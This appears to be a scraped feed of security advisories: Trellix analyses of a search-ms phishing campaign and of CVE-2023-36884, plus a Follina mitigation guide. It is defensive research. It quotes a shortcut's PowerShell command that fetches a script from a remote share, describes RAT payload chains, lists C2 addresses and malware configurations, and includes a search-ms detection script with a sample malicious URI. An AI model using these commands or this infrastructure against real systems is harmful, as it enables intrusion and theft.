\n * displayname=Search: The \"displayname\" parameter sets a custom name for the search query, in this case \"Search\". \n\nPutting it all together, the code sets the window.location.href property to initiate a search operation through the \u201csearch-ms\u201d URI protocol handler. The search looks for items related to \"Review\" within the specified location, which here is the remote file server.\n\n### Behind the Click: Understanding User Interaction\n\nOnce the email recipient clicks on the malicious link, an \"Open Windows Explorer\" prompt typically appears with a clickable button. By clicking on it, the user navigates to the folder where the files matching the search query are stored.\n\n Figure 5: Warning to Open Windows Explorer \n\n\nIf the user allows Windows Explorer to open, several requests are sent to the server depending on the operations to be performed. In Figure 6, we observe the OPTIONS request, which is sent to retrieve the methods and features supported by the server.\n\n Figure 6: Options request \n\n\nNext we see the PROPFIND method, which retrieves metadata or properties associated with a resource or collection on the server. These properties can include the resource's name, size, creation date, modification date, and other custom-defined attributes. This method is used to find items related to the term \u201cReview\u201d from Figure 4 (query=Review). In most cases, the search starts from the root of the directory, and the recursive behaviour of the PROPFIND method in retrieving items may vary depending on the server's settings:\n\n Figure 7: PROPFIND method to find items related to term \u201cReview\u201d \n\n\nThe response to a PROPFIND request on a file in WebDAV is typically an XML document that contains the requested properties or metadata of the file. 
The exact structure and content of the XML response may vary depending on the WebDAV server implementation and the specific properties requested. However, the response includes elements and attributes representing the properties of the file.\n\n Figure 8: PROPFIND method response \n Figure 9: XML Format PROPFIND method response \n\n\nOn receiving the properties of the shortcut file (Review_200630_DeletedItem.lnk), the GET method is used to retrieve the content of the file.\n\n Figure 10: Retrieving shortcut file with GET method \n\n\nBased on the parameters provided in the \u201csearch-ms\u201d query from Figure 4, the Windows Explorer window displays the search result below for items related to \"Review\".\n\n Figure 11: Windows Explorer window with the search result \n\n\nA few of the other shortcut files used in this attack are shown in Figure 12. Attackers employ various tactics to trick unsuspecting victims, and one such method involves manipulating the icons and file names of shortcut files. These deceptive techniques are carefully crafted to exploit human psychology and lure users into interacting with malicious content. By assigning icons that resemble legitimate applications and choosing file names that appear urgent or important, attackers aim to instil a false sense of trust and urgency. Also, each variation of the shortcut file may have a unique signature or fingerprint, making it harder for security tools to identify and block them.\n\n Figure 12: Windows Explorer showing different shortcut files based on search keyword \n\n\nIf the victim clicks on the shortcut file, the malicious DLL file referenced in its command line is executed using the regsvr32.exe utility.\n\n Figure 13: Shortcut file command \n Figure 14: DLL file retrieved using PROPFIND and GET method \n\n\nFor all the network activity, the attacker employed SSL (Secure Sockets Layer) encryption as a tactic to evade network protection measures. 
By leveraging SSL, they concealed their malicious activities within encrypted traffic, bypassing traditional network security controls. To shed light on the nature of this attack, the captured network traffic has been decrypted for illustrative purposes. Decrypting it allows us to analyse and understand the techniques utilized by the attackers, providing valuable insight into their strategies and enhancing our collective knowledge in combating such threats. \n\n## An Alternative Technique: PowerShell-Based Attack Variant\n\nIn this variant, the SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: \n\n * \u2018-ExecutionPolicy Bypass\u2019 to bypass the PowerShell execution policy\n * \u2018-File \\\\\\internetshortcuts[.]link@80\\ePWXBTXU\\over.ps1\u2019 to specify the path of a PowerShell script file named \u2018over.ps1\u2019 located at the given network location. \n\nThe command runs the script without enforcing any execution restrictions, allowing it to execute potentially harmful commands or actions.\n\n Figure 15: Swiftcopy LNK file execution \n\n\nDuring our investigation, we discovered multiple variants of PowerShell files in this campaign, including:\n\n * The \u201cover.ps1\u201d file, which downloads an ISO file, extracts a DLL from it, copies the DLL to a specific directory, registers it using regsvr32.exe, and dismounts the virtual disk.\n * Variants that, instead of using an ISO file, directly download the DLL payload and execute it. \n * PowerShell scripts that download a zip file containing an EXE payload.\n * PowerShell scripts that download and execute DLL files, accompanied by the opening of a decoy PDF file to deceive victims.\n * PowerShell scripts that download and execute VBS files. 
The VBS files execute PowerShell to inject the malicious DLL into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.\n Figure 16: Variants of PowerShell file used in this campaign \n Figure 17: Dynamic Execution of PowerShell variant using ISO file \n\n\n## Malicious Payloads Unleashed: Remote Access Trojans in Action\n\nIn this campaign, the payloads being downloaded are remote access trojans (RATs), specifically AsyncRAT and Remcos RAT. RATs are malicious software that enable unauthorized individuals to gain remote control over an infected system. Once a RAT infects a target, it can perform a range of malicious activities, such as stealing sensitive information, monitoring user activity, executing commands, and even spreading to other connected devices. \n\nNotably, the EXE payload of Remcos RAT is null-byte injected, a technique employed to evade detection by security products. By injecting null bytes into the executable file, the RAT can bypass security mechanisms that rely on file signatures and patterns, allowing it to operate undetected and increasing its chances of successful infiltration and persistence within the compromised system. Trellix has the capability to identify and mitigate such detection-bypass techniques.\n\n## Evading Detection: A Closer Look at the Range of Files Cunningly Utilized by Attackers\n\nDuring the investigation we found that the attacker adopted a proactive approach by regularly updating the files. This strategy is deliberately employed to evade detection by security products. By frequently refreshing the files, the attacker aims to circumvent security measures reliant on static signatures or known indicators of compromise.\n\n Figure 18: Multiple HTML files used as initial attack vector found on compromised website \n\n\nWe also discovered multiple file servers controlled by the attacker; these file servers served as repositories for various malicious files and tools. 
What was even more concerning was that some of the legitimate servers lacked proper authentication measures, providing the attacker with unhindered access. This unrestricted access presented a serious security risk, as the attacker could exploit these weaknesses to orchestrate further attacks with relative ease.\n\n Figure 19: Multiple files identified on Attacker\u2019s Server \n\n\nThe potential impact of this method can be enormous: the intended audience of a document-based exploit might not have a vulnerable version, or might have patched it, whereas in this case the attack is started simply by visiting the URL. \n\nDuring our research, we discovered that the \u201csearch\u201d / \u201csearch-ms\u201d protocol can be invoked in multiple ways within HTML files, as seen in the figure below, revealing its flexibility and potential for exploitation in different scenarios. \n\n Figure 20: Several ways of executing search query in HTML file \n\n\nThreat actors can use the \u201csearch\u201d / \"search-ms\" URI protocol handler to launch attacks using a variety of file types. In our research, we were able to invoke the protocols from different file types, including Batch, PowerShell, Visual Basic, PHP and Office Macro files. When the method is employed from script files, we observed that the user does not receive the Open Windows Explorer prompt seen in Figure 5, so less user interaction is required. Because of its adaptability and accessibility, it might be a tactic that other threat actors find appealing. 
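Detection logic for the URI shape broken down under Figure 4 and for the script-file variants just discussed, as an added example that is not Trellix's code: it extracts search:/search-ms: URIs from HTML or log text, decodes the crumb=location: constraint, and flags the ones that would point Windows Explorer at a remote UNC/WebDAV host instead of a local folder. The sample page and all host names in it are constructed placeholders.

```python
"""Flag "search"/"search-ms" URIs that point Windows Search at a remote share.

Added example for this write-up (not Trellix code). It scans text such as an
HTML page, an email body or a proxy log line for search:/search-ms: URIs,
decodes them, and reports the remote host whenever the crumb=location:
constraint is a UNC/WebDAV path (host@SSL or host@port form) rather than a
local folder. All sample hosts and documents below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import unquote

# A search URI runs until whitespace, a quote, a tag bracket or a closing paren.
_URI_RE = re.compile(r"""\b(search-ms|search):([^\s"'<>)]+)""", re.IGNORECASE)
# UNC location: 2+ backslashes (JS sources double them), host, optional @SSL/@port, path.
_UNC_RE = re.compile(r"^\\{2,}([A-Za-z0-9.\-\[\]]+?)(@SSL|@\d+)?(\\.*)?$", re.IGNORECASE)


@dataclass
class SearchUri:
    scheme: str                          # "search" or "search-ms"
    params: dict = field(default_factory=dict)
    remote_host: Optional[str] = None    # set only when the location crumb is a UNC path
    webdav_hint: Optional[str] = None    # "@SSL" or "@<port>" suffix, if present

    @property
    def is_remote(self) -> bool:
        return self.remote_host is not None


def parse_search_uri(scheme: str, body: str) -> SearchUri:
    """Split the &-separated key=value parameters and classify the location crumb."""
    params = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = unquote(value)   # values may be percent-encoded
    uri = SearchUri(scheme=scheme.lower(), params=params)
    crumb = params.get("crumb", "")
    # Only a location: crumb names a path; other crumbs are property filters.
    if crumb.lower().startswith("location:"):
        match = _UNC_RE.match(crumb[len("location:"):])
        if match:
            uri.remote_host = match.group(1).lower()
            uri.webdav_hint = match.group(2).upper() if match.group(2) else None
    return uri


def find_search_uris(text: str) -> list:
    """All search/search-ms URIs in `text` that carry a real search parameter."""
    found = []
    for m in _URI_RE.finditer(text):
        uri = parse_search_uri(m.group(1), m.group(2))
        # Require query= or crumb= so a bare "search:" in prose is not reported.
        if "query" in uri.params or "crumb" in uri.params:
            found.append(uri)
    return found


def remote_search_hosts(text: str) -> list:
    """Hosts that Windows Explorer would contact if a user followed these URIs."""
    return sorted({u.remote_host for u in find_search_uris(text) if u.is_remote})


# Constructed sample: a page in the shape of Figure 4 (placeholder host), a
# benign local search link, and a legacy search: URI with an encoded @80 share.
SAMPLE_HTML = r"""
<script>
window.location.href = 'search-ms:query=Review&crumb=location:\\\\webdav.example.invalid@SSL\\DavWWWRoot&displayname=Search';
</script>
<a href="search-ms:query=budget&crumb=location:C:\Users\Public\Documents&displayname=Docs">local</a>
<a href="search:query=invoice&crumb=location:%5C%5Cshare.example.invalid%4080%5Cpub">legacy</a>
"""

if __name__ == "__main__":
    for uri in find_search_uris(SAMPLE_HTML):
        verdict = f"REMOTE {uri.remote_host} {uri.webdav_hint or ''}" if uri.is_remote else "local"
        print(f"{uri.scheme}: query={uri.params.get('query')!r} -> {verdict}")
```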
\n\n Figure 21: Execution of search ms query using different file types \n\n\nTo **disable the \u201csearch\u201d / \u201csearch-ms\u201d URI protocol handlers**, run the commands below with administrative privileges: \n\n * reg delete HKEY_CLASSES_ROOT\\search /f\n * reg delete HKEY_CLASSES_ROOT\\search-ms /f\n\n## Conclusion\n\nAs the \u201csearch\u201d / \"search-ms\" URI protocol handler has emerged as a potent initial attack vector, it is crucial to anticipate a potential increase in attacks utilizing this method. It provides threat actors with a convenient means to deliver malicious payloads while evading traditional security defences. To stay safe, users must exercise caution and be wary of untrusted links. It is crucial to refrain from clicking on suspicious URLs or downloading files from unknown sources, as these actions can expose systems to malicious payloads delivered through the \u201csearch\u201d / \"search-ms\" URI protocol handler. By acknowledging the rising trend of attacks leveraging this method and taking proactive steps to mitigate risks, we can enhance our security posture and effectively safeguard against these emerging cyber threats. Together, let us remain vigilant, adaptable, and informed to combat the evolving landscape of cyber-attacks. \n\n## Trellix Product Coverage\n\nTrellix Email Security offers a multi-layered detection strategy for this campaign that includes checks at the URL, email, network, and attachment levels to ensure that any potential threat is discovered and stopped before it harms our customers. To remain ahead of new and changing threats, our product continuously monitors and updates its threat intelligence database. 
This includes the Trellix Multi-Vector Virtual Execution Engine, a new anti-malware core engine, machine-learning behaviour classification and AI correlation engines, real-time threat intelligence from the Trellix Dynamic Threat Intelligence (DTI) Cloud, and defences across the entire attack lifecycle to keep your organisation safer and more resilient. \n\n## Trellix Protection\n\n| Product | Signature |\n| --- | --- |\n| Endpoint Security (ENS) | Trojan-FVIY, HTML/Agent.s, LNK/Agent.ab, PDF/Phishing.u, VBS/Agent.je |\n| Endpoint Security (HX) | Generic.Exploit.CVE-2022-30190.J.1517B09C, Generic.mg.163a08fb103a81ba, Gen:Variant.Mikey.148203, MALICIOUS FILE EXECUTION VIA SHARED STORAGE (METHODOLOGY), WINDOWS SEARCH PROTOCOL EXPLOITATION (METHODOLOGY) |\n| Network Security (NX), Detection as a Service, Email Security, Malware Analysis, File Protect | FEC_Downloader_HTML_Generic_31, FE_Loader_Win64_Generic_148, Trojan.Downloader, FEC_Trojan_LNK_Generic_11, Phishing_JS_Downloader, FE_Trojan_MSIL_Generic_189, FE_Trojan_MSIL_Generic_257, FE_Backdoor_MSIL_ASYNCRAT_3, Malicious ASYNCRAT Indicator, Malware.Binary.lnk, Malware.Binary.exe, Malware.Binary.vbs |\n| Helix | 1.1.3858 - WINDOWS METHODOLOGY [SearchNightmare - search-ms] |\n\n## MITRE ATT&CK\u00ae Techniques\n\n| Tactic | Technique ID | Technique Name |\n| --- | --- | --- |\n| Reconnaissance | [T1589](<https://attack.mitre.org/techniques/T1589>) | Gather Victim Identity Information |\n| Resource Development | [T1586.002](<https://attack.mitre.org/techniques/T1586/002/>) | Compromise Accounts: Email Accounts |\n| Resource Development | [T1584.001](<https://attack.mitre.org/techniques/T1584/001/>) | Compromise Infrastructure: Domains |\n| Initial Access | [T1566.001](<https://attack.mitre.org/techniques/T1566/001/>) | Spearphishing Attachment |\n| Initial Access | [T1566.002](<https://attack.mitre.org/techniques/T1566/002/>) | Spearphishing Link |\n| Execution | [T1204.001](<https://attack.mitre.org/techniques/T1204/001/>) | User Execution: Malicious Link |\n| Execution | [T1204.002](<https://attack.mitre.org/techniques/T1204/002/>) | User Execution: Malicious File |\n| Execution | [T1059.001](<https://attack.mitre.org/techniques/T1059/001>) | Command and Scripting Interpreter: PowerShell |\n| Execution | [T1059.007](<https://attack.mitre.org/techniques/T1059/007/>) | Command and Scripting Interpreter: JavaScript |\n| Execution | [T1218.010](<https://attack.mitre.org/techniques/T1218/010/>) | System Binary Proxy Execution: Regsvr32 |\n| Execution | [T1053](<https://attack.mitre.org/techniques/T1053>) | Scheduled Task/Job |\n| Persistence | [T1053](<https://attack.mitre.org/techniques/T1053>) | Scheduled Task/Job |\n| Defense Evasion | [T1036.008](<https://attack.mitre.org/techniques/T1036/008/>) | Masquerading: Masquerade File Type |\n| Defense Evasion | [T1564.003](<https://attack.mitre.org/techniques/T1564/003/>) | Hide Artifacts: Hidden Window |\n| Defense Evasion | [T1497](<https://attack.mitre.org/techniques/T1497>) | Virtualization/Sandbox Evasion |\n| Defense Evasion | [T1140](<https://attack.mitre.org/techniques/T1140/>) | Deobfuscate/Decode Files or Information |\n| Defense Evasion | [T1218.010](<https://attack.mitre.org/techniques/T1218/010/>) | System Binary Proxy Execution: Regsvr32 |\n| Defense Evasion | [T1055](<https://attack.mitre.org/techniques/T1055>) | Process Injection |\n| Discovery | [T1012](<https://attack.mitre.org/techniques/T1012/>) | Query Registry |\n| Discovery | [T1082](<https://attack.mitre.org/techniques/T1082>) | System Information Discovery |\n| Discovery | [T1497](<https://attack.mitre.org/techniques/T1497>) | Virtualization/Sandbox Evasion |\n| Command and Control | [T1571](<https://attack.mitre.org/techniques/T1571>) | Non-Standard Port |\n| Command and Control | [T1071](<https://attack.mitre.org/techniques/T1071/>) | Application Layer Protocol |\n| Command and Control | [T1573](<https://attack.mitre.org/techniques/T1573>) | Encrypted Channel |\n\n## Indicators Of Compromise (IoCs)\n\n
\n\nInstall_HKLM\\\\\\Winlogon\\\\\\Shell: 0 \n\nSetup_path: %LOCALAPPDATA% \n\nCopy_file: remcos.exe \n\nStartup_value: True \n\nHide_file: False \n\nMutex_name: pqowndhk-KEQR6K \n\nKeylog_flag: 1 \n\nKeylog_path: %LOCALAPPDATA% \n\nKeylog_file: logs.dat \n\nKeylog_crypt: False \n\nHide_keylog: False \n\nScreenshot_flag: False \n\nScreenshot_time: 5 \n\nTake_Screenshot: True \n\nMouse_option: False \n\nDelete_file: False \n\nAudio_record_time: 5 \n\nAudio_path: %ProgramFiles% \n\nConnect_delay: 0 \n\nCopy_dir: Remcos \n\nKeylog_dir: Mozila \n\n### AsyncRAT Configuration\n\nC2: 79.110.49.162, 111.90.150.186 \n\nPorts: 6606, 7707, 8808, 8753, 8977, 9907 \n\nBotnet: Default \n\nVersion: 0.5.7B \n\nAutoRun: false \n\nMutex: AsyncMutex_6SI8OkPnk \n\nInstallFolder: %AppData% \n\nBSoD: false \n\nAntiVM: false \n\nAES: 02630f7bfb8bafcd79ec1c49e1d7184c15d03f662e520f6ee201ae7cd14247e6 \n\nSalt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941 \n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. 
_\n", "cvss3": {}, "published": "2023-07-26T00:00:00", "type": "trellix", "title": "Beyond File Search: A Novel Method", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T00:00:00", "id": "TRELLIX:FC79F74B85714DFB2F725665CE9B700F", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-24T00:00:00", "description": "# The Tale of Two Exploits - Breaking Down CVE-2023-36884 and the Infection Chain\n\nBy [Chintan Shah](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/chintan-shah.html>) \u00b7 August 24, 2023\n\n## Executive Summary\n\nOn July 11, 2023, Microsoft released a patch fixing multiple actively exploited RCE vulnerabilities and [disclosed](<https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/>) a phishing campaign conducted by a threat actor identified as Storm-0978, which targeted entities in Europe and North America. This campaign used a zero-day vulnerability tracked as CVE-2023-36884, a remote code execution vulnerability in Windows Search files that is exploited via crafted Office Open eXtensible Markup Language (OOXML) documents with specific geopolitical lures related to the Ukraine World Congress (UWC). While a [workaround](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884>) was suggested to mitigate this vulnerability, on August 8, 2023, the [Microsoft Office Defense in Depth update](<https://msrc.microsoft.com/update-guide/vulnerability/ADV230003>) was released, breaking the exploitation chain that led to RCE through Windows Search (*.search-ms) files.\n\nHardening of operating systems and several exploit mitigation features have resulted in a steady decline in the exploitation and weaponization of memory corruption vulnerabilities. 
Abusing features of Microsoft Office has been at the forefront of the techniques adversaries use to execute targeted attacks. This is fundamentally because its rich feature set exposes a large attack surface, and its wide adoption and ease of exploitation make it a lucrative attack vector. We\u2019ve seen many such instances in the past, such as CVE-2022-30190, [CVE-2021-40444](<https://kcm.trellix.com/corporate/index?page=content&id=KB94876>) and many others, where Office documents were used either as a carrier for other file format exploits or to link to malicious external resources or objects, which in turn exploit vulnerabilities by invoking the respective object renderers. Office documents have historically also been used to chain multiple vulnerabilities together to achieve Remote Code Execution (RCE). Previously, we blogged about CVE-2022-37985, an information disclosure vulnerability in the Windows Graphics Component, which can be exploited through Office documents and, when chained with other vulnerabilities that give arbitrary write primitives, has the potential to achieve code execution. \n\nIn this blog, we take a deeper look at the malicious OOXML and embedded Rich Text Format (RTF) document exploit used in targeted attacks against government entities and visualize the attack sequence and chain of exploits. 
We will also attempt to reconstruct the document lures programmatically using the same technique, with sample code, and highlight the Trellix IPS and product coverage against the exploits used in this attack.\n\n## Introduction\n\nIn this attack campaign, threat actors used multiple OOXML documents with the following names and SHA-1 hashes: \n\nOverview_of_UWCs_UkraineInNATO_campaign.docx [2400b169ee2c38ac146c67408debc9b4fa4fca5f]\n\nLetter_NATO_Summit_Vilnius_2023_ENG (1).docx [3de83c6298a7dc6312c352d4984be8e1cb698476]\n\nFigure 1 \u2013 document lures used in the campaign \n\nWhile quickly scanning the OOXML lures through our in-house Office file analysis engine, we noticed an RTF document embedded inside. Further analysis of the RTF through the same scanning engine surfaced multiple suspicious indicators, shown below. This triggered our investigation into the technique used to embed RTF into OOXML, and into whether we could apply the same method to reconstruct the lures that lead to the chain of infection.\n\nFigure 2 \u2013 Detection for document lures \n\nThe document structure of both exploits used in this campaign is similar to the one used in the Follina attack (CVE-2022-30190). However, in the Follina exploit, Object Linking was used to link the OOXML document to an externally hosted HTML file, as detailed in our previous blog. In the OOXML exploiting CVE-2023-36884, an **Alternate Format Chunk (AltChunk / aFChunk)** embeds an RTF file within the OOXML. Use of the AltChunk class is indicated by the **w:altChunk** element in the document.xml part once the container document is decompressed, as shown below:\n\nFigure 3 \u2013 document.xml using altChunk to embed malicious RTF \n\n## Use of \u201cAlternative Chunk\u201d in CVE-2023-36884\n\nTraditionally, Office exploits used Object Linking and Embedding (OLE) to embed external content into the container application. 
In this exploit, **altChunk (stands for Alternative Chunk)** is used, which is an OpenXML standard providing the way to merge two documents into a single larger document. The **AltChunk** element indicates the container application to import the content stored in the alternative part of the document (in this case, an RTF document).\n\nThe **altChunk** element specifies the location in the OOXML document for inserting the content of the specified file into the target document. The content type to be inserted and the location of the file is specified by the relationship **Type** and **Target** elements with the same relationship id as used above in **document.xml.rels** within the **/word/_rels** directory as shown in the exploit below. \n\n Figure 4 \u2013 Relationship Target referring embedded RTF \n\n\nAs per the [specifications](<https://learn.microsoft.com/en-us/openspecs/office_standards/ms-oi29500/c391c28f-1b03-4a21-a4f8-4d9cddd4a95c>), the relationship Type should be \u201c**\u2026/relationships/aFChunk**\u201d, as shown above, and the **TargetMode** should be specified as \u201cInternal,\u201d which is missing but Office seems to ignore the attribute and still processes the document. Multiple content types can be imported with this method including application/rtf, application/html, application/text, application/xml, etc, which effectively allows OOXML documents to be used as a carrier for other file format exploits.\n\n## Analysis of embedded RTF (afChunk.rtf)\n\nTaking a deeper look at the embedded RTF document, it has precisely two embedded objects which download additional malware payloads through redirection chains. One of the embedded OLE objects inside the RTF is a linked object indicated by a \u201c**objautlink**\u201d RTF control word followed by \u201c**objupdate**\u201d, which forces the objects / links to update before displaying the contents of the linked object. 
\n\nFigure 5 \u2013 Embedded object 1 in RTF \n\nAdditionally, the embedded object contains a Universal Naming Convention (UNC) path to the external IP, initiating a connection to the externally hosted SMB server to download another file, **file001.url** (SHA-1 70560aff35f1904f822e49d3316303877819eef8). This is again a Word document embedding HTML content with an iframe source, which is rendered upon launching the original document.\n\nFigure 6 \u2013 View of OLE object using OLE2LINK technique of linking RTF doc \n\nThe other OLE object is also a linked object, with an objclass of \u201cxmlfile\u201d and an oleclsid of \u201cStdOleLink\u201d. This effectively means the StdOleLink OLE object is used to link the RTF to an externally hosted XML file. This was one of the widely adopted techniques and was also used in the massively exploited CVE-2017-0199. This linking feature can still be used in a similar fashion to exploit logic flaws in other renderer components. Once the RTF is launched, a connection is initiated to the external IP to retrieve start.xml, which is then rendered by [SAX XML Reader 6.0](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms764622\\(v=vs.85\\)>) (msxml6.dll). The retrieved XML file in turn has an embedded iframe source pointing to another file, RFile.asp, in the same path. 
Part of the infection chain can be visualized below.\n\nFigure 7 \u2013 Embedded object 2 in RTF \n\nFigure 8 \u2013 View of OLE object using OLE2LINK technique of linking RTF doc \n\nFigure 9 \u2013 RTF document initiating connection to retrieve start.xml \n\nFigure 10 \u2013 Contents of start.xml containing iframe \n\nAs seen in the _RFile.asp_ code below, it starts with a timeout of 30000 seconds and then loads another iframe contained within it, which retrieves a .htm file from the same attacker-controlled server, 104.234.239.26. That server generates the file dynamically based on the IP address of the victim and the unique id in the path of the HTTP request.\n\nFigure 11 \u2013 Contents of the RFile.asp \n\nThe infection chain thus turns out to be a series of iframe redirects: it resumes with the fetching of the .htm file and subsequently of search-ms files, and eventually ends up downloading the final payload. The entire infection chain can be visualized with the following infographic:\n\nFigure 12 \u2013 Visualization of CVE-2023-36884 infection chain \n<https://twitter.com/r00tbsd/status/1679042071477338114> \n\n## Can we reconstruct the exploit using URL Moniker and \u201cAltChunk\u201d?\n\nThe C# sample code below uses the **DocumentFormat.OpenXml** package and demonstrates how we can reconstruct the OOXML document with embedded RTF using the \u201caltChunk\u201d class, as used by attackers in this campaign. This code embeds _Document1.rtf_ into _Document2.docx_ and creates another file with the name CVE-2023-36884.docx. \n\nTo altChunk the RTF document into the OOXML, the code first initializes a unique altChunkId as a relationship id. It then creates a new AlternativeFormatImportPart with that altChunkId by calling the OpenXML API **AddAlternativeFormatImportPart** with **AlternativeFormatImportPartType** set to RTF, adding the part to the main document (CVE-2023-36884.docx). 
As mentioned in the previous sections, [AlternativeFormatImportPartType](<https://learn.microsoft.com/en-us/dotnet/api/documentformat.openxml.packaging.alternativeformatimportparttype?view=openxml-2.8.1>) is an enum that specifies the content types that can be imported.\n\nFigure 13 \u2013 AlternativeFormatImportPartType used to import multiple content types \n\nSubsequently, after creating the new AltChunk, the contents of Document1.rtf are inserted at the end of the main document (CVE-2023-36884.docx). We believe the same technique must have been used by the exploit authors to build the exploit. \n\nFigure 14 \u2013 Document1.rtf \n\nFigure 15 \u2013 Document2.docx \n\nFigure 16 \u2013 Code to insert RTF into DOCX using AltChunk \n\nFigure 17 \u2013 Reconstructed POC exploit with connection to start.xml initiating the infection chain \n\n## Trellix IPS protection and Product Coverage against this attack \n\nTrellix NSP has been one of the most advanced IPS products in the security industry, consistently engaged in protecting customers from advanced attacks. Cutting-edge IPS features such as **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** protect customers against a variety of file format attacks and help correlate multiple low or medium severity alerts in the attack cycle, increasing the overall confidence level. 
[Trellix IPS released](<https://kcm.trellix.com/agent/index?page=content&id=KB96639>) the following detections for protection against this attack.\n\n| IPS Attack ID | Attack Name |\n| --- | --- |\n| 0x452d8200 | HTTP: Microsoft Office Remote Code Execution Vulnerability (CVE-2023-36884) |\n| 0x452da500 | HTTP: Microsoft Office Post Exploitation Activity I (CVE-2023-36884) |\n| 0x452d8300 | HTTP: Microsoft Office Post Exploitation Activity (CVE-2023-36884) |\n\n### Trellix Product Coverage\n\n| Product | Detection Details |\n| --- | --- |\n| ENS-AV | PUP-ILJ; RTFObfustream.a; Generic Trojan.mq; HTML/Agent.s; HTML/CVE2023-36884.a |\n| ENS-EP | CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability.md |\n| HX-IOC | SUSPICIOUS LAUNCH OF MSDT.EXE BY OFFICE APPS A (METHODOLOGY) |\n| HX-AV/MG | Trojan.GenericKD.67946770; Exploit.CVE-2017-0199.02.Gen; Trojan.GenericFCA.Agent.98791; Trojan.GenericFCA.Agent.98790 |\n| Network (NX) | NX: Trojan.Generic.DNS; NX IPS: FE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability |\n| MVX | FE_Exploit_RTF_CVE20170199_1; FEC_Exploit_RTF_CVE20170199_1_FEBeta (703874); FEC_Exploit_RTF_Generic_1_FEBeta (703875); FEC_Exploit_RTF_Generic_2_FEBeta (703876); FEC_Trojan_HTML_Generic_64_FEBeta (703877); Suspicious Network Activity (10405); Trojan.Generic.MVX (43183) |\n| HELIX | WINDOWS METHODOLOGY [Office Suspicious Child Process] (1.1.2497); WINDOWS METHODOLOGY [Impacket Secretsdump] (1.1.3336); IMPACKET OBFUSCATION [WmiExec Commands] (1.1.3942) |\n\n## Conclusion 
\n\nMicrosoft Office continues to be the top target for attackers, especially when it comes to abusing features and exploiting design and logic flaws. As native memory corruption flaws gradually decline, along with the inherent challenges in weaponizing them, this feature-rich application, with its wide attack surface, offers an attacker the path of least resistance. In one of our previous blogs we predicted this exploitation trend, and CVE-2023-36884 is yet another validation of it. We believe this trend will continue, with vulnerabilities in application features and their easy exploitation remaining a challenge for organizations. Consequently, endpoint and network security solutions will have to continuously evolve to address those challenges. By applying secure application design and development, we can certainly break the exploitation chain and remain protected against these attacks. \n\n## Indicators of Compromise (IOCs)\n\n### Hashes of malicious files\n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-08-24T00:00:00", "type": "trellix", "title": "The Tale of Two Exploits - Breaking Down CVE-2023-36884 and the Infection Chain", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-1099", "CVE-2021-40444", "CVE-2022-30190", "CVE-2022-37985", "CVE-2023-30190", "CVE-2023-36884"], "modified": "2023-08-24T00:00:00", "id": "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/breaking-down-cve-2023-36884-and-the-infection-chain.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestpartners": [{"lastseen": "2022-07-13T15:54:57", "description": "\n\n_Disclaimer: I know this isn\u2019t a unique post on the subject, and that many other outlets are covering it, but this zero-day is so serious that it needs as much coverage as possible. It simply needs shouting about._\n\n**Updated 06/06/2022 following advice from Microsoft's [@reybango](<https://twitter.com/reybango>).**\n\nThe vulnerability was reported to Microsoft by Shadow Chaser Group member [@CrazymanArmy](<https://twitter.com/crazymanarmy>).\n\n### What is it?\n\nIt exists in Microsoft Windows Support Diagnostic Tool (MSDT), enabling remote code execution. It\u2019s been assigned a [CVE](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190>) and Microsoft provide details here [CVE-2022-30190](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nMicrosoft says:\n\n\n\nA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. 
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\n\n\nPut more simply, it makes Arbitrary Code Execution attacks possible when previewing or opening documents.\n\n### How do I deal with it?\n\nThere are two protocol handlers that need to be unregistered: **ms-msdt** and **search-ms**. \n\n\n### ms-msdt\n\nMicrosoft were quick to publish a workaround to prevent attacks that exploit the vulnerability: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>\n\nThe advice in that post is to disable the MSDT URL Protocol:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201d\n 3. Execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n### search-ms\n\n[@hackerfantastic](<https://twitter.com/hackerfantastic>) published advice [here](<https://twitter.com/hackerfantastic/status/1531793396423176193>). He said "Note that this is not CVE-2022-30190 but uses the same OLEObject vector as CVE-2021-40444 and CVE-2022-30190, however as it requires additional user interaction and an outbound UNC connection the CVSS risk score is reduced. It is also currently unpatched but mitigation steps work".\n\nThe steps are:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\search-ms filename\u201d\n 3. 
